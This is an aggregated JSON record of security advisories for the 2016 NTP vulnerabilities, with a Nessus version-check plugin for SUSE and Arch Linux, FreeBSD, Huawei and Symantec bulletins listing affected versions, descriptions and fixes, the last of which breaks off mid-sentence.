attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1011411\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1011417\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=943216\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=956365\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=981252\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=988028\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=992038\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=992606\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-5219/\"\n );\n 
script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-8139/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-8140/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7426/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7427/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7428/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7429/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7431/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7433/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7434/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-9310/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-9311/\"\n );\n # https://www.suse.com/support/update/announcement/2016/suse-su-20163193-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f2cf838e\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server 11-SP4:zypper in -t patch\nslessp4-ntp-12895=1\n\nSUSE Linux Enterprise Debuginfo 11-SP4:zypper in -t patch\ndbgsp4-ntp-12895=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n 
script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ntp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ntp-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/01/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/21\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^(SLES11)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES11\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES11\" && (! preg(pattern:\"^(4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES11 SP4\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"ntp-4.2.8p9-57.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"ntp-doc-4.2.8p9-57.2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ntp\");\n}\n", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}], "huawei": [{"lastseen": "2019-02-01T18:02:17", "bulletinFamily": "software", "cvelist": ["CVE-2016-7434", "CVE-2016-9311", "CVE-2016-7433", "CVE-2016-7427", "CVE-2016-7429", "CVE-2016-7428", "CVE-2016-9310", "CVE-2016-7426", "CVE-2016-7431"], "description": "", "edition": 1, "modified": "2017-11-29T00:00:00", "published": "2017-11-29T00:00:00", "id": "HUAWEI-SA-20171129-01-NTPD", "href": 
"https://www.huawei.com/en/psirt/security-advisories/2017/huawei-sa-20171129-01-ntpd-en", "title": "Security Advisory - Multiple NTPd Vulnerabilities in Huawei Products", "type": "huawei", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "archlinux": [{"lastseen": "2020-09-22T18:36:44", "bulletinFamily": "unix", "cvelist": ["CVE-2016-7426", "CVE-2016-7427", "CVE-2016-7428", "CVE-2016-7429", "CVE-2016-7431", "CVE-2016-7433", "CVE-2016-7434", "CVE-2016-9310", "CVE-2016-9311"], "description": "Arch Linux Security Advisory ASA-201611-28\n==========================================\n\nSeverity: High\nDate : 2016-11-26\nCVE-ID : CVE-2016-7426 CVE-2016-7427 CVE-2016-7428 CVE-2016-7429\nCVE-2016-7431 CVE-2016-7433 CVE-2016-7434 CVE-2016-9310\nCVE-2016-9311\nPackage : ntp\nType : multiple issues\nRemote : Yes\nLink : https://wiki.archlinux.org/index.php/CVE\n\nSummary\n=======\n\nThe package ntp before version 4.2.8.p9-1 is vulnerable to multiple\nissues including denial of service, insufficient validation and\nincorrect calculation.\n\nResolution\n==========\n\nUpgrade to 4.2.8.p9-1.\n\n# pacman -Syu \"ntp>=4.2.8.p9-1\"\n\nThe problems have been fixed upstream in version 4.2.8.p9.\n\nWorkaround\n==========\n\nA partial fix to some of the issues is to implement BCP-38, use\n\"restrict default noquery ...\" in your ntp.conf file and only allow\nmode 6 queries from trusted networks and hosts.\n\nDescription\n===========\n\n- CVE-2016-7426 (denial of service)\n\nWhen ntpd is configured with rate limiting for all associations\n(restrict default limited in ntp.conf), the limits are applied also to\nresponses received from its configured sources. 
An attacker who knows\nthe sources (e.g., from an IPv4 refid in server response) and knows the\nsystem is (mis)configured in this way can periodically send packets\nwith spoofed source address to keep the rate limiting activated and\nprevent ntpd from accepting valid responses from its sources.\n\n- CVE-2016-7427 (denial of service)\n\nThe broadcast mode of NTP is expected to only be used in a trusted\nnetwork. If the broadcast network is accessible to an attacker, a\npotentially exploitable denial of service vulnerability in ntpd's\nbroadcast mode replay prevention functionality can be abused. An\nattacker with access to the NTP broadcast domain can periodically\ninject specially crafted broadcast mode NTP packets into the broadcast\ndomain which, while being logged by ntpd, can cause ntpd to reject\nbroadcast mode packets from legitimate NTP broadcast servers.\n\n- CVE-2016-7428 (denial of service)\n\nThe broadcast mode of NTP is expected to only be used in a trusted\nnetwork. If the broadcast network is accessible to an attacker, a\npotentially exploitable denial of service vulnerability in ntpd's\nbroadcast mode poll interval enforcement functionality can be abused.\nTo limit abuse, ntpd restricts the rate at which each broadcast\nassociation will process incoming packets. ntpd will reject broadcast\nmode packets that arrive before the poll interval specified in the\npreceding broadcast packet expires. An attacker with access to the NTP\nbroadcast domain can send specially crafted broadcast mode NTP packets\nto the broadcast domain which, while being logged by ntpd, will cause\nntpd to reject broadcast mode packets from legitimate NTP broadcast\nservers.\n\n- CVE-2016-7429 (denial of service)\n\nWhen ntpd receives a server response on a socket that corresponds to a\ndifferent interface than was used for the request, the peer structure\nis updated to use the interface for new requests. 
If ntpd is running on\na host with multiple interfaces in separate networks and the operating\nsystem doesn't check source address in received packets (e.g. rp_filter\non Linux is set to 0), an attacker that knows the address of the source\ncan send a packet with spoofed source address which will cause ntpd to\nselect wrong interface for the source and prevent it from sending new\nrequests until the list of interfaces is refreshed, which happens on\nrouting changes or every 5 minutes by default. If the attack is\nrepeated often enough (once per second), ntpd will not be able to\nsynchronize with the source.\n\n- CVE-2016-7431 (insufficient validation)\n\nZero Origin timestamp problems were fixed by Bug 2945 in ntp-4.2.8p6.\nHowever, subsequent timestamp validation checks introduced a regression\nin the handling of some Zero origin timestamp checks.\n\n- CVE-2016-7433 (incorrect calculation)\n\nntpd Bug 2085 described a condition where the root delay was included\ntwice, causing the jitter value to be higher than expected. Due to a\nmisinterpretation of a small-print variable in The Book, the fix for\nthis problem was incorrect, resulting in a root distance that did not\ninclude the peer dispersion. The calculations and formula have been\nreviewed and reconciled, and the code has been updated accordingly.\n\n- CVE-2016-7434 (denial of service)\n\nIf ntpd is configured to allow mrulist query requests from a server\nthat sends a crafted malicious packet, ntpd will crash on receipt of\nthat crafted malicious mrulist query packet.\n\n- CVE-2016-9310 (denial of service)\n\nAn exploitable configuration modification vulnerability exists in the\ncontrol mode (mode 6) functionality of ntpd. If, against long-standing\nBCP recommendations, \"restrict default noquery ...\" is not specified, a\nspecially crafted control mode packet can set ntpd traps, providing\ninformation disclosure and DDoS amplification, and unset ntpd traps,\ndisabling legitimate monitoring. 
A remote, unauthenticated, network\nattacker can trigger this vulnerability.\n\n- CVE-2016-9311 (denial of service)\n\nntpd does not enable trap service by default. If trap service has been\nexplicitly enabled, an attacker can send a specially crafted packet to\ncause a null pointer dereference that will crash ntpd, resulting in a\ndenial of service.\n\nImpact\n======\n\nA remote unauthenticated attacker may be able to perform a denial of\nservice attack on ntpd via multiple vectors.\n\nReferences\n==========\n\nhttp://support.ntp.org/bin/view/Main/SecurityNotice#November_2016_ntp_4_2_8p9_NTP_Se\nhttp://www.kb.cert.org/vuls/id/633847\nhttp://support.ntp.org/bin/view/Main/NtpBug3071\nhttp://support.ntp.org/bin/view/Main/NtpBug3114\nhttp://support.ntp.org/bin/view/Main/NtpBug3113\nhttp://support.ntp.org/bin/view/Main/NtpBug3072\nhttp://support.ntp.org/bin/view/Main/NtpBug3102\nhttp://support.ntp.org/bin/view/Main/NtpBug3067\nhttp://bugs.ntp.org/show_bug.cgi?id=2085\nhttp://support.ntp.org/bin/view/Main/NtpBug3082\nhttp://support.ntp.org/bin/view/Main/NtpBug3118\nhttp://support.ntp.org/bin/view/Main/NtpBug3119\nhttps://access.redhat.com/security/cve/CVE-2016-7426\nhttps://access.redhat.com/security/cve/CVE-2016-7427\nhttps://access.redhat.com/security/cve/CVE-2016-7428\nhttps://access.redhat.com/security/cve/CVE-2016-7429\nhttps://access.redhat.com/security/cve/CVE-2016-7431\nhttps://access.redhat.com/security/cve/CVE-2016-7433\nhttps://access.redhat.com/security/cve/CVE-2016-7434\nhttps://access.redhat.com/security/cve/CVE-2016-9310\nhttps://access.redhat.com/security/cve/CVE-2016-9311", "modified": "2016-11-26T00:00:00", "published": "2016-11-26T00:00:00", "id": "ASA-201611-28", "href": "https://security.archlinux.org/ASA-201611-28", "type": "archlinux", "title": "[ASA-201611-28] ntp: multiple issues", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}], "freebsd": [{"lastseen": "2019-05-29T18:32:24", "bulletinFamily": "unix", "cvelist": 
["CVE-2016-7434", "CVE-2016-9311", "CVE-2016-7433", "CVE-2016-7427", "CVE-2016-7428", "CVE-2016-9310", "CVE-2016-7426", "CVE-2016-7431"], "description": "\nProblem Description:\nMultiple vulnerabilities have been discovered in the NTP\n\tsuite:\nCVE-2016-9311: Trap crash, Reported by Matthew Van Gundy\n\tof Cisco ASIG.\nCVE-2016-9310: Mode 6 unauthenticated trap information\n\tdisclosure and DDoS vector. Reported by Matthew Van Gundy\n\tof Cisco ASIG.\nCVE-2016-7427: Broadcast Mode Replay Prevention DoS.\n\tReported by Matthew Van Gundy of Cisco ASIG.\nCVE-2016-7428: Broadcast Mode Poll Interval Enforcement\n\tDoS. Reported by Matthew Van Gundy of Cisco ASIG.\nCVE-2016-7431: Regression: 010-origin: Zero Origin\n\tTimestamp Bypass. Reported by Sharon Goldberg and Aanchal\n\tMalhotra of Boston University.\nCVE-2016-7434: Null pointer dereference in\n\t_IO_str_init_static_internal(). Reported by Magnus Stubman.\nCVE-2016-7426: Client rate limiting and server responses.\n\tReported by Miroslav Lichvar of Red Hat.\nCVE-2016-7433: Reboot sync calculation problem. Reported\n\tindependently by Brian Utterback of Oracle, and by Sharon\n\tGoldberg and Aanchal Malhotra of Boston University.\nImpact:\nA remote attacker who can send a specially crafted packet\n\tto cause a NULL pointer dereference that will crash ntpd,\n\tresulting in a Denial of Service. 
[CVE-2016-9311]\nAn exploitable configuration modification vulnerability\n\texists in the control mode (mode 6) functionality of ntpd.\n\tIf, against long-standing BCP recommendations, \"restrict\n\tdefault noquery ...\" is not specified, a specially crafted\n\tcontrol mode packet can set ntpd traps, providing information\n\tdisclosure and DDoS amplification, and unset ntpd traps,\n\tdisabling legitimate monitoring by an attacker from remote.\n\t[CVE-2016-9310]\nAn attacker with access to the NTP broadcast domain can\n\tperiodically inject specially crafted broadcast mode NTP\n\tpackets into the broadcast domain which, while being logged\n\tby ntpd, can cause ntpd to reject broadcast mode packets\n\tfrom legitimate NTP broadcast servers. [CVE-2016-7427]\nAn attacker with access to the NTP broadcast domain can\n\tsend specially crafted broadcast mode NTP packets to the\n\tbroadcast domain which, while being logged by ntpd, will\n\tcause ntpd to reject broadcast mode packets from legitimate\n\tNTP broadcast servers. [CVE-2016-7428]\nOrigin timestamp problems were fixed in ntp 4.2.8p6.\n\tHowever, subsequent timestamp validation checks introduced\n\ta regression in the handling of some Zero origin timestamp\n\tchecks. [CVE-2016-7431]\nIf ntpd is configured to allow mrulist query requests\n\tfrom a server that sends a crafted malicious packet, ntpd\n\twill crash on receipt of that crafted malicious mrulist\n\tquery packet. [CVE-2016-7434]\nAn attacker who knows the sources (e.g., from an IPv4\n\trefid in server response) and knows the system is (mis)configured\n\tin this way can periodically send packets with spoofed\n\tsource address to keep the rate limiting activated and\n\tprevent ntpd from accepting valid responses from its sources.\n\t[CVE-2016-7426]\nNtp Bug 2085 described a condition where the root delay\n\twas included twice, causing the jitter value to be higher\n\tthan expected. 
Due to a misinterpretation of a small-print\n\tvariable in The Book, the fix for this problem was incorrect,\n\tresulting in a root distance that did not include the peer\n\tdispersion. The calculations and formulas have been reviewed\n\tand reconciled, and the code has been updated accordingly.\n\t[CVE-2016-7433]\n", "edition": 5, "modified": "2016-12-22T00:00:00", "published": "2016-12-22T00:00:00", "id": "FCEDCDBB-C86E-11E6-B1CF-14DAE9D210B8", "href": "https://vuxml.freebsd.org/freebsd/fcedcdbb-c86e-11e6-b1cf-14dae9d210b8.html", "title": "FreeBSD -- Multiple vulnerabilities of ntp", "type": "freebsd", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:32:28", "bulletinFamily": "unix", "cvelist": ["CVE-2016-9312", "CVE-2016-7434", "CVE-2016-9311", "CVE-2016-7433", "CVE-2016-7427", "CVE-2016-7429", "CVE-2016-7428", "CVE-2016-9310", "CVE-2016-7426", "CVE-2016-7431"], "description": "\nNetwork Time Foundation reports:\n\nNTF's NTP Project is releasing ntp-4.2.8p9, which addresses:\n\n1 HIGH severity vulnerability that only affects Windows\n2 MEDIUM severity vulnerabilities\n2 MEDIUM/LOW severity vulnerabilities\n5 LOW severity vulnerabilities\n28 other non-security fixes and improvements\n\nAll of the security issues in this release are listed in\n\t VU#633847.\n\n", "edition": 5, "modified": "2016-11-21T00:00:00", "published": "2016-11-21T00:00:00", "id": "8DB8D62A-B08B-11E6-8EBA-D050996490D0", "href": "https://vuxml.freebsd.org/freebsd/8db8d62a-b08b-11e6-8eba-d050996490d0.html", "title": "ntp -- multiple vulnerabilities", "type": "freebsd", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}], "symantec": [{"lastseen": "2020-12-24T10:41:07", "bulletinFamily": "software", "cvelist": ["CVE-2016-7426", "CVE-2016-7427", "CVE-2016-7428", "CVE-2016-7429", "CVE-2016-7431", "CVE-2016-7433", "CVE-2016-7434", "CVE-2016-9310", "CVE-2016-9311", "CVE-2016-9312"], "description": "### SUMMARY\n\nSymantec Network Protection 
products using affected versions of the NTP reference implementation from ntp.org are susceptible to multiple vulnerabilities. A remote attacker can modify the target's system time, prevent the target from synchronizing its time, cause denial of service through NTP daemon crashes, perform DDoS attack amplification, and evade security monitoring in the NTP daemon. \n \n\n\n### AFFECTED PRODUCTS \n\nThe following products are vulnerable:\n\n**Content Analysis (CA)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nAll CVEs | 2.2 and later | Not vulnerable, fixed in 2.2.1.1 \nCVE-2016-7429, CVE-2016-7433 | 2.1 | Upgrade to later release with fixes. \n1.3 | Upgrade to later release with fixes. \nCVE-2016-7431 | 2.1 | Upgrade to later release with fixes. \n1.3.7.3, 1.3.7.4 | Upgrade to later release with fixes. \n \n \n\n**Director** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nAll CVEs except CVE-2016-7429 | 6.1 | Upgrade to 6.1.23.1. \n \n \n\n**Mail Threat Defense (MTD)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-7429, CVE-2016-7433 | 1.1 | Not available at this time \n \n \n\n**Management Center (MC)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-7431, CVE-2016-7433 | 1.11 and later | Not vulnerable, fixed in 1.11.1.1. \n1.10 | Upgrade to later release with fixes. \n1.9 | Upgrade to later release with fixes. \n1.8 | Upgrade to later release with fixes. \n \n \n\n**Reporter** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-7429, CVE-2016-7431, \nCVE-2016-7433 | 10.2 and later | Not vulnerable, fixed in 10.2.1.1. \n10.1 | Upgrade to 10.1.5.5. \nAll CVEs | 9.5 | Not vulnerable \nAll CVEs | 9.4 | Not vulnerable \n \n \n\n**Security Analytics** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nAll CVEs | 7.3 and later | Not vulnerable, fixed in 7.3.1. 
\nCVE-2016-7426, CVE-2016-7429, \nCVE-2016-7433, CVE-2016-9310, \nCVE-2016-9311 | 7.2 | Upgrade to 7.2.3. \n7.1 | Upgrade to later release with fixes. \n6.6 | Upgrade to later release with fixes. \nCVE-2016-7427, CVE-2016-7428, CVE-2016-7431, CVE-2016-7434 | 7.2.2 | Not available at this time \n7.1 with ntp-4.2.8p8 RPM patch | Upgrade to later release with fixes. \n6.6 with ntp-4.2.8p8 RPM patch | Upgrade to later release with fixes. \n \n \n\n**SSL Visibility (SSLV)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-7431, CVE-2016-7433 | 4.1 and later | Not vulnerable, fixed in 4.1.1.1. \n4.0 | Upgrade to later release with fixes. \n3.8, 3.8.4FC, 3.9, 3.10, 3.12 | Not vulnerable to known vectors of attack. \n \n \n\n**X-Series XOS** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-7426, CVE-2016-7429, \nCVE-2016-7433, CVE-2016-9310, \nCVE-2016-9311 | 11.0 | Not available at this time \n10.0 | Not available at this time \n9.7 | Upgrade to later release with fixes. \n \n \n\nThe following products contain a vulnerable version of the ntp.org NTP reference implementation, but are not vulnerable to known vectors of attack:\n\n**Advanced Secure Gateway (ASG)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nAll CVEs | 7.1 | Not vulnerable, fixed in 7.1.1.1 \n6.7 | Upgrade to 6.7.3.1. \n6.6 | Upgrade to later release with fixes. \n \n \n\n### ADDITIONAL PRODUCT INFORMATION\n\nSymantec Network Protection products do not enable or use all functionality within the ntp.org NTP reference implementation. The products listed below do not utilize the functionality described in the CVEs below and are thus not known to be vulnerable to them. 
However, fixes for these CVEs will be included in the patches that are provided.\n\n * **ASG:** all CVEs\n * **CA:** CVE-2016-7426, CVE-2016-7427, CVE-2016-7428, CVE-2016-7434, CVE-2016-9310, CVE-2016-9311, and CVE-2016-9312\n * **Director:** CVE-2016-7429\n * **MTD:** CVE-2016-7426, CVE-2016-9310, CVE-2016-9311, and CVE-2016-9312\n * **MC:** CVE-2016-7426, CVE-2016-7429, CVE-2016-9310, CVE-2016-9311, and CVE-2016-9312\n * **Reporter 10.1:** CVE-2016-7426, CVE-2016-7427, CVE-2016-7428, CVE-2016-7434, CVE-2016-9310, CVE-2016-9311, and CVE-2016-9312\n * **Security Analytics:** CVE-2016-9312\n * **SSLV 3.x and 4.x:** CVE-2016-7426, CVE-2016-7427, CVE-2016-7428, CVE-2016-7429 (4.0 only), CVE-2016-7434, CVE-2016-9310, CVE-2016-9311\n\nThe following products are not vulnerable: \n**Android Mobile Agent \nAuthConnector \nBCAAA \nSymantec HSM Agent for the Luna SP \nCacheFlow \nClient Connector \nCloud Data Protection for Salesforce \nCloud Data Protection for Salesforce Analytics \nCloud Data Protection for ServiceNow \nCloud Data Protection for Oracle CRM On Demand \n**Cloud Data Protection for Oracle Field Service Cloud** \nCloud Data Protection for Oracle Sales Cloud \nCloud Data Protection Integration Server \nCloud Data Protection Communication Server \nCloud Data Protection Policy Builder \nGeneral Auth Connector Login Application \nIntelligenceCenter \nIntelligenceCenter Data Collector \nK9 \nMalware Analysis \nNorman Shark Industrial Control System Protection \nNorman Shark Network Protection \nNorman Shark SCADA Protection \nPacketShaper \nPacketShaper S-Series \nPolicyCenter \nPolicyCenter S-Series \nProxyClient \nProxyAV \nProxyAV ConLog and ConLogXP \nProxySG \nUnified Agent \nWeb Isolation**\n\nSymantec no longer provides vulnerability information for the following products:\n\n**DLP** \nPlease, contact Digital Guardian technical support regarding vulnerability information for DLP. 
\n \n\n\n### ISSUES \n\n**CVE-2016-7426** \n--- \n**Severity / CVSSv2** | Medium / 4.3 (AV:N/AC:M/Au:N/C:N/I:N/A:P) \n**References** | SecurityFocus: [BID 94451](<https://www.securityfocus.com/bid/94451>) / NVD: [CVE-2016-7426](<https://nvd.nist.gov/vuln/detail/CVE-2016-7426>) \n**Impact** | Denial of service \n**Description** | A flaw in rate limiting allows a remote attacker to send NTP packets with spoofed source IP addresses and cause the target to reject legitimate packets from configured NTP servers. The attacker can thus prevent the target from synchronizing its system time. \n \n \n\n**CVE-2016-7427** \n--- \n**Severity / CVSSv2** | Low / 3.3 (AV:A/AC:L/Au:N/C:N/I:N/A:P) \n**References** | SecurityFocus: [BID 94447](<https://www.securityfocus.com/bid/94447>) / NVD: [CVE-2016-7427](<https://nvd.nist.gov/vuln/detail/CVE-2016-7427>) \n**Impact** | Denial of service \n**Description** | A flaw in NTP broadcast packet replay prevention allows a remote attacker with access to the NTP broadcast domain to send crafted broadcast packets and cause the target to reject legitimate packets from NTP broadcast servers. The attacker can thus prevent the target from synchronizing its system time. \n \n \n\n**CVE-2016-7428** \n--- \n**Severity / CVSSv2** | Low / 3.3 (AV:A/AC:L/Au:N/C:N/I:N/A:P) \n**References** | SecurityFocus: [BID 94446](<https://www.securityfocus.com/bid/94446>) / NVD: [CVE-2016-7428](<https://nvd.nist.gov/vuln/detail/CVE-2016-7428>) \n**Impact** | Denial of service \n**Description** | A flaw in NTP broadcast packet poll interval enforcement allows a remote attacker with access to the NTP broadcast domain to send crafted broadcast packets and cause the target to reject legitimate packets from NTP broadcast servers. The attacker can thus prevent the target from synchronizing its system time. 
\n \n \n\n**CVE-2016-7429** \n--- \n**Severity / CVSSv2** | Medium / 4.3 (AV:N/AC:M/Au:N/C:N/I:N/A:P) \n**References** | SecurityFocus: [BID 94453](<https://www.securityfocus.com/bid/94453>) / NVD: [CVE-2016-7429](<https://nvd.nist.gov/vuln/detail/CVE-2016-7429>) \n**Impact** | Denial of service \n**Description** | There is a flaw in the NTP daemon when it listens on multiple network interfaces and the operating system does not validate the source address of received packets. A remote attacker can send an NTP packet with a spoofed source IP address on an unexpected network interface to corrupt the NTP daemon's internal state and prevent it from synchronizing the system time. \n \n \n\n**CVE-2016-7431** \n--- \n**Severity / CVSSv2** | Medium / 5.0 (AV:N/AC:L/Au:N/C:N/I:P/A:N) \n**References** | SecurityFocus: [BID 94454](<https://www.securityfocus.com/bid/94454>) / NVD: [CVE-2016-7431](<https://nvd.nist.gov/vuln/detail/CVE-2016-7431>) \n**Impact** | Denial of service, unauthorized modification of time \n**Description** | A flaw in NTP packet origin timestamp validation allows a remote attacker to send crafted NTP packets and either modify the target's system time or prevent it from synchronizing its time. \n \n \n\n**CVE-2016-7433** \n--- \n**Severity / CVSSv2** | Medium / 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P) \n**References** | SecurityFocus: [BID 94455](<https://www.securityfocus.com/bid/94455>) / NVD: [CVE-2016-7433](<https://nvd.nist.gov/vuln/detail/CVE-2016-7433>) \n**Impact** | Unauthorized modification of time \n**Description** | A flaw in initial time synchronization allows a remote attacker to send a spoofed NTP response and modify the target's system time. 
\n \n \n\n**CVE-2016-7434** \n--- \n**Severity / CVSSv2** | Medium / 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P) \n**References** | SecurityFocus: [BID 94448](<https://www.securityfocus.com/bid/94448>) / NVD: [CVE-2016-7434](<https://nvd.nist.gov/vuln/detail/CVE-2016-7434>) \n**Impact** | Denial of service \n**Description** | A flaw in mrulist query handling allows a remote attacker to send crafted query requests to the NTP daemon and cause it to crash, resulting in denial of service. \n \n \n\n**CVE-2016-9310** \n--- \n**Severity / CVSSv2** | Medium / 6.4 (AV:N/AC:L/Au:N/C:P/I:N/A:P) \n**References** | SecurityFocus: [BID 94452](<https://www.securityfocus.com/bid/94452>) / NVD: [CVE-2016-9310](<https://nvd.nist.gov/vuln/detail/CVE-2016-9310>) \n**Impact** | Information disclosure, DDoS amplification, security control bypass \n**Description** | A missing authorization flaw allows a remote attacker to send query requests and obtain sensitive information, perform DDoS attack amplification, and evade security monitoring in the target's NTP daemon. \n \n \n\n**CVE-2016-9311** \n--- \n**Severity / CVSSv2** | High / 7.1 (AV:N/AC:M/Au:N/C:N/I:N/A:C) \n**References** | SecurityFocus: [BID 94444](<https://www.securityfocus.com/bid/94444>) / NVD: [CVE-2016-9311](<https://nvd.nist.gov/vuln/detail/CVE-2016-9311>) \n**Impact** | Denial of service \n**Description** | A flaw in remote query handling allows a remote attacker to send crafted query requests to the NTP daemon and cause it to crash, resulting in denial of service. 
\n \n \n\n**CVE-2016-9312** \n--- \n**Severity / CVSSv2** | Medium / 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P) \n**References** | SecurityFocus: [BID 94450](<https://www.securityfocus.com/bid/94450>) / NVD: [CVE-2016-9312](<https://nvd.nist.gov/vuln/detail/CVE-2016-9312>) \n**Impact** | Denial of service \n**Description** | A flaw in oversized packet handling on Windows platforms allows a remote attacker to send crafted NTP packets to the NTP daemon and cause it to crash, resulting in denial of service. \n \n \n\n### MITIGATION\n\nThese vulnerabilities can be exploited only through the management network port for CA, Director, MTD, MC, Security Analytics, SSLV, and XOS. Allowing only machines, IP addresses and subnets from a trusted network to access the management network port reduces the threat of exploiting the vulnerabilities.\n\nBy default, Director does not enable unrestricted rate limiting, NTP broadcast mode, and remote querying in the NTP daemon. Customers who leave these NTP features disabled prevent attacks against Director using CVE-2016-7426, 